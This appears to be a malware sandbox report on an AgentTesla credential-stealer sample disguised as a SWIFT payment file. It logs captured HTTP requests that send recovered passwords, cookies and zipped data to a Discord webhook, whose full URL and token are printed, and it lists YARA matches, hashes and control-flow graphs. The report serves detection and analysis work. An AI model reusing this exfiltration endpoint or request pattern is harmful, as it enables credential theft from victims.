                                                                    Content-Type: multipart/form-data; boundary=----------eeaef95b509b45a590275f60ce750e22
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                                    Host: discord.com
                                                                    Content-Length: 1168
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    2023-06-06 15:26:57 UTC0INHTTP/1.1 100 Continue
                                                                    2023-06-06 15:26:57 UTC0OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 65 65 61 65 66 39 35 62 35 30 39 62 34 35 61 35 39 30 32 37 35 66 36 30 63 65 37 35 30 65 32 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 6e 61 6d 65 22 0d 0a 0d 0a 6a 6f 6e 65 73 2d 32 32 36 35 34 36 20 32 30 32 33 2d 30 36 2d 30 36 20 31 37 2d 32 36 2d 35 36 2e 68 74 6d 6c 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 65 65 61 65 66 39 35 62 35 30 39 62 34 35 61 35 39 30 32 37 35 66 36 30 63 65 37 35 30 65 32 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 66 6f 72 6d 61 74 22 0d 0a 0d 0a 68 74 6d 6c 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 65 65
                                                                    Data Ascii: ------------eeaef95b509b45a590275f60ce750e22Content-Disposition: form-data; name="filename"user-226546 2023-06-06 17-26-56.html------------eeaef95b509b45a590275f60ce750e22Content-Disposition: form-data; name="fileformat"html------------ee
                                                                    2023-06-06 15:26:57 UTC1INHTTP/1.1 200 OK
                                                                    Date: Tue, 06 Jun 2023 15:26:57 GMT
                                                                    Content-Type: application/json
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    set-cookie: __dcfduid=93406608047e11eea6293adf4eb4bfb2; Expires=Sun, 04-Jun-2028 15:26:57 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/
                                                                    strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                    x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                    x-ratelimit-limit: 5
                                                                    x-ratelimit-remaining: 4
                                                                    x-ratelimit-reset: 1686065219
                                                                    x-ratelimit-reset-after: 1
                                                                    Via: 1.1 google
                                                                    Alt-Svc: h3=":443"; ma=86400
                                                                    CF-Cache-Status: DYNAMIC
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2F5Ct824cQZ15dNDI16Y6BaQjyIL8sCZIrLWv%2FNMcxUg7qoT2urdRgQUNUgolt23UjICk1EzN3wMSTKLGAl5UR93MENul1mN1dBQz%2FaUsD0MQXPcwsN4HqZ8yRrrP"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    X-Content-Type-Options: nosniff
                                                                    Set-Cookie: __sdcfduid=93406608047e11eea6293adf4eb4bfb2fe4a05c5deaba934f0683b44184d3dbc11e0e922e4f699538309b7c89192a66e; Expires=Sun, 04-Jun-2028 15:26:57 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/
                                                                    Set-Cookie: __cfruid=5f3601177ec3489270be0c37665c718dbd12fcdf-1686065217; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                    Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                    Server: cloudflare
                                                                    CF-RAY: 7d3
                                                                    2023-06-06 15:26:57 UTC2INData Raw: 31 61 64 33 39 38 39 61 61 31 63 33 61 2d 46 52 41 0d 0a 0d 0a
                                                                    Data Ascii: 1ad3989aa1c3a-FRA
                                                                    2023-06-06 15:26:57 UTC2INData Raw: 34 32 31 0d 0a 7b 22 69 64 22 3a 20 22 31 31 31 35 36 36 33 31 32 37 36 31 31 31 37 39 30 35 39 22 2c 20 22 74 79 70 65 22 3a 20 30 2c 20 22 63 6f 6e 74 65 6e 74 22 3a 20 22 4e 65 77 20 50 57 20 52 65 63 6f 76 65 72 65 64 21 5c 6e 5c 6e 54 69 6d 65 3a 20 30 36 2f 30 36 2f 32 30 32 33 20 31 37 3a 32 36 3a 35 36 5c 6e 55 73 65 72 20 4e 61 6d 65 3a 20 6a 6f 6e 65 73 2f 32 32 36 35 34 36 5c 6e 4f 53 46 75 6c 6c 4e 61 6d 65 3a 20 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 5c 6e 43 50 55 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 5c 6e 52 41 4d 3a 20 38 31 39 31 2e 32 35 20 4d 42 22 2c 20 22 63 68 61 6e 6e 65 6c 5f 69 64 22 3a 20 22 31 31 31 34 39 37 37 34
                                                                    Data Ascii: 421{"id": "1115663127611179059", "type": 0, "content": "New PW Recovered!\n\nTime: 06/06/2023 17:26:56\nUser Name: user/226546\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB", "channel_id": "11149774
                                                                    2023-06-06 15:26:57 UTC3INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    1192.168.2.449696162.159.137.232443C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2023-06-06 15:26:58 UTC3OUTPOST /api/webhooks/1114977540709289984/k4SQohEZgHj3IRvaJBioKCVlTv-1sy0NPHEWl2GHdoz5JLvX6trIkig77Yg2Nm1avTr9 HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=----------658f909b118b4ef2b71a26c0fc5e5610
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                                    Host: discord.com
                                                                    Content-Length: 1954
                                                                    Expect: 100-continue
                                                                    2023-06-06 15:26:58 UTC4INHTTP/1.1 100 Continue
                                                                    2023-06-06 15:26:58 UTC4OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 36 35 38 66 39 30 39 62 31 31 38 62 34 65 66 32 62 37 31 61 32 36 63 30 66 63 35 65 35 36 31 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 6e 61 6d 65 22 0d 0a 0d 0a 6a 6f 6e 65 73 2d 32 32 36 35 34 36 20 32 30 32 33 2d 30 36 2d 30 36 20 31 37 2d 32 36 2d 35 37 2e 7a 69 70 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 36 35 38 66 39 30 39 62 31 31 38 62 34 65 66 32 62 37 31 61 32 36 63 30 66 63 35 65 35 36 31 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 66 6f 72 6d 61 74 22 0d 0a 0d 0a 7a 69 70 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 36 35 38 66
                                                                    Data Ascii: ------------658f909b118b4ef2b71a26c0fc5e5610Content-Disposition: form-data; name="filename"user-226546 2023-06-06 17-26-57.zip------------658f909b118b4ef2b71a26c0fc5e5610Content-Disposition: form-data; name="fileformat"zip------------658f
                                                                    2023-06-06 15:26:58 UTC6INHTTP/1.1 200 OK
                                                                    Date: Tue, 06 Jun 2023 15:26:58 GMT
                                                                    Content-Type: application/json
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    set-cookie: __dcfduid=93a4c3b4047e11eeb5829a4f114d12d6; Expires=Sun, 04-Jun-2028 15:26:58 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/
                                                                    strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                    x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                    x-ratelimit-limit: 5
                                                                    x-ratelimit-remaining: 4
                                                                    x-ratelimit-reset: 1686065219
                                                                    x-ratelimit-reset-after: 1
                                                                    Via: 1.1 google
                                                                    Alt-Svc: h3=":443"; ma=86400
                                                                    CF-Cache-Status: DYNAMIC
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=NvgQy4llCC%2BwS8WJz8CfJ1SqamupaYcODP7vFPcRCEMc8PA7PrsSsL02XMMExt5xz87IxVe3lwRqH7v1KuBDpxfB66OK1p%2FdLe3pGK%2F6dkn%2F2B6XUp8RVliI1kyX"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    X-Content-Type-Options: nosniff
                                                                    Set-Cookie: __sdcfduid=93a4c3b4047e11eeb5829a4f114d12d6ac68d4cb064888f2c86839d02c3fbd6cc441ae74fff5925fec687c3b6d19d43f; Expires=Sun, 04-Jun-2028 15:26:58 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/
                                                                    Set-Cookie: __cfruid=a84eec43b35ee26f7e6b4e310b11072d0f04bf2f-1686065218; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                    Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                    Server: cloudflare
                                                                    CF-RAY: 7
                                                                    2023-06-06 15:26:58 UTC7INData Raw: 64 33 31 61 64 33 64 66 61 31 64 39 30 31 36 2d 46 52 41 0d 0a 0d 0a
                                                                    Data Ascii: d31ad3dfa1d9016-FRA
                                                                    2023-06-06 15:26:58 UTC7INData Raw: 34 31 36 0d 0a 7b 22 69 64 22 3a 20 22 31 31 31 35 36 36 33 31 33 30 35 30 31 30 36 36 39 31 35 22 2c 20 22 74 79 70 65 22 3a 20 30 2c 20 22 63 6f 6e 74 65 6e 74 22 3a 20 22 4e 65 77 20 43 4f 20 52 65 63 6f 76 65 72 65 64 21 5c 6e 5c 6e 54 69 6d 65 3a 20 30 36 2f 30 36 2f 32 30 32 33 20 31 37 3a 32 36 3a 35 37 5c 6e 55 73 65 72 20 4e 61 6d 65 3a 20 6a 6f 6e 65 73 2f 32 32 36 35 34 36 5c 6e 4f 53 46 75 6c 6c 4e 61 6d 65 3a 20 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 5c 6e 43 50 55 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 5c 6e 52 41 4d 3a 20 38 31 39 31 2e 32 35 20 4d 42 22 2c 20 22 63 68 61 6e 6e 65 6c 5f 69 64 22 3a 20 22 31 31 31 34 39 37 37 34
                                                                    Data Ascii: 416{"id": "1115663130501066915", "type": 0, "content": "New CO Recovered!\n\nTime: 06/06/2023 17:26:57\nUser Name: user/226546\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB", "channel_id": "11149774
                                                                    2023-06-06 15:26:58 UTC8INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Click to jump to process

                                                                    Click to jump to process

                                                                    Click to dive into process behavior distribution

                                                                    Click to jump to process

                                                                    Target ID:0
                                                                    Start time:17:26:50
                                                                    Start date:06/06/2023
                                                                    Path:C:\Users\user\Desktop\SWIFT05062023.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Users\user\Desktop\SWIFT05062023.exe
                                                                    Imagebase:0x16f705a0000
                                                                    File size:217664 bytes
                                                                    MD5 hash:B7475F585B317B4CDB0F385F147E635D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:.Net C# or VB.NET
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.540511718.0000016F11ADA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    Reputation:low

                                                                    Target ID:1
                                                                    Start time:17:26:51
                                                                    Start date:06/06/2023
                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe
                                                                    Imagebase:0xe60000
                                                                    File size:107624 bytes
                                                                    MD5 hash:F866FC1C2E928779C7119353C3091F0C
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:.Net C# or VB.NET
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000001.00000002.799972283.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000002.800774951.0000000003641000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.800774951.0000000003641000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    Reputation:moderate

                                                                    Reset < >

                                                                      Execution Graph

                                                                      Execution Coverage:12.3%
                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                      Signature Coverage:0%
                                                                      Total number of Nodes:3
                                                                      Total number of Limit Nodes:0
                                                                      execution_graph 2862 7ff81621165c 2863 7ff8162116c7 VirtualProtect 2862->2863 2865 7ff8162117f9 2863->2865

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 66 7ff81621165c-7ff8162116c5 67 7ff8162116c8-7ff8162117f7 VirtualProtect 66->67 68 7ff8162116c7 66->68 72 7ff8162117f9 67->72 73 7ff8162117ff-7ff81621184d 67->73 68->67 72->73
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.542764130.00007FF816210000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF816210000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff816210000_SWIFT05062023.jbxd
                                                                      Similarity
                                                                      • API ID: ProtectVirtual
                                                                      • String ID:
                                                                      • API String ID: 544645111-0
                                                                      • Opcode ID: db2beeb66e3b5f787e1b859c5eb8517a21182ff4d4dbf070cea3e83ccf546e67
                                                                      • Instruction ID: abe884a8b8bc542da76683ca76f4e1800decfe1485991d94a32709cb6f162bb7
                                                                      • Opcode Fuzzy Hash: db2beeb66e3b5f787e1b859c5eb8517a21182ff4d4dbf070cea3e83ccf546e67
                                                                      • Instruction Fuzzy Hash: 97619D7190C78C8FDB45DF58C899AE9BBF0FB26310F1441AFC049D7292DA349985CB81
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.542764130.00007FF816210000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF816210000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff816210000_SWIFT05062023.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 4027ef27d6313e562090a5a4c91a5a647a4debd78b897fb02c03ab7ff06951ef
                                                                      • Instruction ID: 53128a6efddd5eec92e77d5cd27a679c3bc0107b7c546441cf35372aec773df2
                                                                      • Opcode Fuzzy Hash: 4027ef27d6313e562090a5a4c91a5a647a4debd78b897fb02c03ab7ff06951ef
                                                                      • Instruction Fuzzy Hash: A121AD7190D7C98FD7068B64D8256A97BF1FF86310F0982AAD085DB1A2DA385A0ACB11
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Execution Graph

                                                                      Execution Coverage:12.4%
                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                      Signature Coverage:0%
                                                                      Total number of Nodes:10
                                                                      Total number of Limit Nodes:0
                                                                      execution_graph 28963 67999e8 28964 67999ec 28963->28964 28965 6799b16 GlobalMemoryStatusEx 28964->28965 28966 6799a05 28964->28966 28965->28966 28955 57559b0 28956 57559ce 28955->28956 28959 5754834 28956->28959 28958 5755a05 28961 57574d0 LoadLibraryA 28959->28961 28962 57575c9 28961->28962
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.803142756.0000000005750000.00000040.00000800.00020000.00000000.sdmp, Offset: 05750000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_5750000_CasPol.jbxd
                                                                      Similarity
                                                                      • API ID: LibraryLoad
                                                                      • String ID:
                                                                      • API String ID: 1029625771-0
                                                                      • Opcode ID: 7e8e9c71491f7478eab1384691f9a6e9cbc8222a071a40bb9a16e5e5bf00c26b
                                                                      • Instruction ID: 162dc05a38a8b653ae1413d5a550a988fa0018e839b8537b21ebb2ebbf1e9f3c
                                                                      • Opcode Fuzzy Hash: 7e8e9c71491f7478eab1384691f9a6e9cbc8222a071a40bb9a16e5e5bf00c26b
                                                                      • Instruction Fuzzy Hash: ECE21970E00219DFCB25DF64C894A9EBBB6FF94310F5085E9D909AB260EB705E85DF81
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 1758 6794040-6794062 1759 6794064-6794067 1758->1759 1760 6794069-6794085 1759->1760 1761 679408a-679408d 1759->1761 1760->1761 1762 67940ca-67940cd 1761->1762 1763 679408f-67940c5 1761->1763 1765 67940da-67940dd 1762->1765 1766 67940cf-67940d5 1762->1766 1763->1762 1767 67940ea-67940ed 1765->1767 1768 67940df-67940e5 1765->1768 1766->1765 1771 6794308-679430e 1767->1771 1772 67940f3-67940f6 1767->1772 1768->1767 1775 679410c-6794112 1771->1775 1776 6794314 1771->1776 1773 67940f8-67940fc 1772->1773 1774 6794107-679410a 1772->1774 1778 67941f2-67941f3 1773->1778 1779 6794102 1773->1779 1774->1775 1780 6794124-6794127 1774->1780 1781 6794468-6794470 1775->1781 1782 6794118-679411f 1775->1782 1783 6794319-679431c 1776->1783 1786 67941f8-67941fb 1778->1786 1779->1774 1784 6794129-6794198 1780->1784 1785 679419d-67941a0 1780->1785 1804 67944d8-67944dd 1781->1804 1805 6794472-679449d 1781->1805 1782->1780 1787 679431e-679434d 1783->1787 1788 6794352-6794355 1783->1788 1784->1785 1790 67941d0-67941d3 1785->1790 1791 67941a2-67941cb 1785->1791 1795 67941fd-679420f 1786->1795 1796 6794214-6794217 1786->1796 1787->1788 1793 679438f-6794392 1788->1793 1794 6794357-679438a 1788->1794 1806 67941ed-67941f0 1790->1806 1807 67941d5-67941db 1790->1807 1791->1790 1802 67943ae-67943b1 1793->1802 1803 6794394-67943a3 1793->1803 1794->1793 1795->1796 1800 6794219-679421f 1796->1800 1801 6794224-6794227 1796->1801 1800->1801 1809 6794229-6794258 1801->1809 1810 679425d-6794260 1801->1810 1811 67943c8-67943cb 1802->1811 1812 67943b3-67943c3 1802->1812 1832 67943a9 1803->1832 1833 67942cd-67942ce 1803->1833 1815 679451f-6794540 1804->1815 1816 67944df-67944e3 1804->1816 1813 679449f-67944a2 1805->1813 1806->1778 1806->1786 1807->1781 1817 67941e1-67941e8 1807->1817 1809->1810 1825 679429d-67942a0 1810->1825 1826 6794262-6794298 1810->1826 1823 67943cd-67943cf 1811->1823 1824 67943d2-67943d5 1811->1824 1812->1811 1821 67944ca-67944cd 1813->1821 1822 67944a4-67944c5 1813->1822 1879 679455f-679456b 1815->1879 1883 6794542-679454c 1815->1883 1829 67944e4-67944e7 1816->1829 1817->1806 1821->1829 1837 67944cf-67944d1 1821->1837 1822->1821 1823->1824 1835 67943db-67943de 1824->1835 1836 67942a2-67942a8 1824->1836 1825->1836 1841 67942b3-67942b6 1825->1841 1826->1825 1839 67944e9-67944f3 1829->1839 1840 67944f4-67944f7 1829->1840 1832->1802 1843 67942d3-67942d6 1833->1843 1846 67943e0-67943e2 1835->1846 1847 67943e5-67943e8 1835->1847 1836->1807 1852 67942ae 1836->1852 1837->1804 1850 67944f9-6794515 1840->1850 1851 679451a-679451d 1840->1851 1853 67942c8-67942cb 1841->1853 1854 67942b8-67942c3 1841->1854 1857 67942d8-67942fe 1843->1857 1858 6794303-6794306 1843->1858 1846->1847 1860 6794418-679441b 1847->1860 1861 67943ea-6794413 1847->1861 1850->1851 1851->1815 1855 679454d-679454f 1851->1855 1852->1841 1853->1833 1853->1843 1854->1853 1866 6794551 1855->1866 1867 6794556-6794559 1855->1867 1857->1858 1858->1771 1858->1783 1871 679444b-679444d 1860->1871 1872 679441d-6794446 1860->1872 1861->1860 1866->1867 1867->1813 1867->1879 1875 679444f 1871->1875 1876 6794454-6794457 1871->1876 1872->1871 1875->1876 1876->1759 1882 679445d-6794467 1876->1882 1885 6794571-679457a 1879->1885 1886 6794760-679476a 1879->1886 1893 679476b-67947a6 1885->1893 1894 6794580-679459f 1885->1894 1907 67947a8-67947ab 1893->1907 1914 679474e-679475a 1894->1914 1915 67945a5-67945ae 1894->1915 1909 67947ad-67947c9 1907->1909 1910 67947ce-67947d1 1907->1910 1909->1910 1911 67949b5-67949b7 1910->1911 1912 67947d7-67947dd 1910->1912 1917 67949b9 1911->1917 1918 67949be-67949c1 1911->1918 1920 67947e7-67947ed 1912->1920 1914->1885 1914->1886 1915->1893 1919 67945b4-67945e9 1915->1919 1917->1918 1918->1907 1921 67949c7-67949d0 1918->1921 1932 67945eb-6794649 1919->1932 1933 6794651-679466d 1919->1933 1924 67947f4-67947f6 1920->1924 1925 67947f8-67947fb 1924->1925 1926 679480d-679483f 1924->1926 1925->1921 1936 67949aa-67949b4 1926->1936 1937 6794845-679484e 1926->1937 1932->1933 1944 6794698-67946b4 1933->1944 1945 679466f-6794690 1933->1945 1939 6794983-67949a8 1937->1939 1940 6794854-679497b 1937->1940 1939->1921 1940->1937 2002 6794981 1940->2002 1957 67946df-67946f6 1944->1957 1958 67946b6-67946d7 1944->1958 1945->1944 1970 67946f8-6794702 1957->1970 1971 6794704 1957->1971 1958->1957 1975 6794709-679470b 1970->1975 1971->1975 1977 679470d-6794712 1975->1977 1978 679473c-6794748 1975->1978 1979 6794720 1977->1979 1980 6794714-679471e 1977->1980 1978->1914 1978->1915 1982 6794725-6794727 1979->1982 1980->1982 1982->1978 1983 6794729-6794735 1982->1983 1983->1978 2002->1936
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.804325442.0000000006790000.00000040.00000800.00020000.00000000.sdmp, Offset: 06790000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_6790000_CasPol.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: eda656a4b068fec4b6c8ee76520e9f175ee3ba584e3b53a7a3130c8d4cf1791f
                                                                      • Instruction ID: 0e70730dae69284594c9ee1fe93b9638dc2ee0238fffce9a47f3b50a09d418da
                                                                      • Opcode Fuzzy Hash: eda656a4b068fec4b6c8ee76520e9f175ee3ba584e3b53a7a3130c8d4cf1791f
                                                                      • Instruction Fuzzy Hash: 2542C434F0015A9FDF54DBB8D8986ADB7F2EB85314F108869D806EB388DE35DC468B61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.804325442.0000000006790000.00000040.00000800.00020000.00000000.sdmp, Offset: 06790000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_6790000_CasPol.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 123608382f00b9dce42587087649e39b21cf2f9f070bf2596e1e3f25d6736614
                                                                      • Instruction ID: 341ffecaf19db2a0feaa99de5c8a1f2d5a80e6b0fdd8b6f9eb9fcb0fe88f8c0d
                                                                      • Opcode Fuzzy Hash: 123608382f00b9dce42587087649e39b21cf2f9f070bf2596e1e3f25d6736614
                                                                      • Instruction Fuzzy Hash: 87229674F101099BEFA4DBACE4847BDB7F2EB45320F204829E416EB391DA35DD458BA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 2240 679c640-679c642 2241 679c64a-679c64d 2240->2241 2242 679c644-679c649 2240->2242 2244 679c64f-679c659 2241->2244 2245 679c6c7-679c6db 2241->2245 2242->2241 2248 679c65b-679c65e 2244->2248 2247 679c6dd-679c6e0 2245->2247 2249 679c701-679c704 2247->2249 2250 679c6e2-679c6fc 2247->2250 2251 679c66e-679c671 2248->2251 2252 679c660-679c667 2248->2252 2253 679c70e-679c711 2249->2253 2254 679c706-679c70b 2249->2254 2250->2249 2258 679c680-679c683 2251->2258 2259 679c673 2251->2259 2255 679c669 2252->2255 2256 679c695-679c699 2252->2256 2260 679c713-679c717 2253->2260 2261 679c722-679c725 2253->2261 2254->2253 2255->2251 2268 679c69e-679c6a0 2256->2268 2264 679c690-679c693 2258->2264 2265 679c685-679c689 2258->2265 2269 679c67b 2259->2269 2262 679c71d 2260->2262 2263 679c856-679c85a 2260->2263 2266 679c738-679c73b 2261->2266 2267 679c727-679c72d 2261->2267 2262->2261 2270 679c85c 2263->2270 2271 679c8b2-679c8b9 2263->2271 2264->2256 2264->2268 2272 679c68b 2265->2272 2273 679c6ac-679c6af 2265->2273 2276 679c73d-679c751 2266->2276 2277 679c756-679c759 2266->2277 2274 679c7f0-679c801 2267->2274 2275 679c733 2267->2275 2278 679c6a2 2268->2278 2279 679c6a7-679c6aa 2268->2279 2269->2258 2280 679c861-679c864 2270->2280 2272->2264 2291 679c806-679c809 2274->2291 2275->2266 2276->2277 2281 679c75b-679c76f 2277->2281 2282 679c774-679c777 2277->2282 2278->2279 2279->2248 2279->2273 2284 679c86c-679c86f 2280->2284 2285 679c866-679c867 2280->2285 2281->2282 2282->2263 2283 679c77d-679c780 2282->2283 2289 679c78a-679c78d 2283->2289 2290 679c782-679c787 2283->2290 2292 679c871-679c875 2284->2292 2293 679c880-679c883 2284->2293 2285->2284 2294 679c79f-679c7a2 2289->2294 2295 679c78f-679c79a 2289->2295 2290->2289 2291->2267 2296 679c80f-679c812 2291->2296 2292->2281 2297 679c87b 2292->2297 2298 679c890-679c893 2293->2298 2299 679c885-679c889 2293->2299 2302 679c7b4-679c7b7 2294->2302 2303 679c7a4-679c7af 2294->2303 2295->2294 2304 679c814-679c822 2296->2304 2305 679c827-679c82a 2296->2305 2297->2293 2300 679c8a0-679c8a2 2298->2300 2301 679c895-679c899 2298->2301 2306 679c88b 2299->2306 2307 679c82c-679c82e 2299->2307 2310 679c8a9-679c8ac 2300->2310 2311 679c8a4 2300->2311 2301->2271 2309 679c89b 2301->2309 2313 679c7b9-679c7bf 2302->2313 2314 679c7eb-679c7ee 2302->2314 2303->2302 2304->2305 2305->2307 2308 679c831-679c834 2305->2308 2306->2298 2307->2308 2315 679c851-679c854 2308->2315 2316 679c836-679c84c 2308->2316 2309->2300 2310->2247 2310->2271 2311->2310 2319 679c7ce-679c7d4 2313->2319 2320 679c7c1-679c7c6 2313->2320 2314->2274 2314->2291 2315->2263 2315->2280 2316->2315 2321 679c8ba-679c8cd 2319->2321 2322 679c7da-679c7e6 2319->2322 2320->2319 2326 679c8cf-679c8de 2321->2326 2327 679c947-679c948 2321->2327 2322->2314 2332 679c8e0-679c8e3 2326->2332 2329 679c949-679c983 2327->2329 2330 679c903-679c907 2327->2330 2343 679c989 2329->2343 2344 679c985-679c987 2329->2344 2331 679c910-679c946 call 679be30 2330->2331 2331->2327 2334 679c8f3-679c8f5 2332->2334 2335 679c8e5-679c8ec 2332->2335 2339 679c8fc-679c8ff 2334->2339 2340 679c8f7 2334->2340 2337 679c909-679c90e 2335->2337 2338 679c8ee 2335->2338 2337->2331 2338->2334 2339->2332 2341 679c901 2339->2341 2340->2339 2341->2330 2347 679c98e-679cbb7 call 679c0f8 call 679c5a8 * 3 2343->2347 2344->2347
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.804325442.0000000006790000.00000040.00000800.00020000.00000000.sdmp, Offset: 06790000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_6790000_CasPol.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 1d3f0d166f0248d4f44267d669aede3dfa7cb2ca147fcbca5868f580809c720d
                                                                      • Instruction ID: 22c78aeff3007c764b92f9d5ca84db75270d7f5bd9adf80628f1aeb94d3d4258
                                                                      • Opcode Fuzzy Hash: 1d3f0d166f0248d4f44267d669aede3dfa7cb2ca147fcbca5868f580809c720d
                                                                      • Instruction Fuzzy Hash: EF120974B101008FEF65CF68D888B7AB7E1EF49710F5544AAE906DB3A2DA71EC41CB61
                                                                      Uniqueness

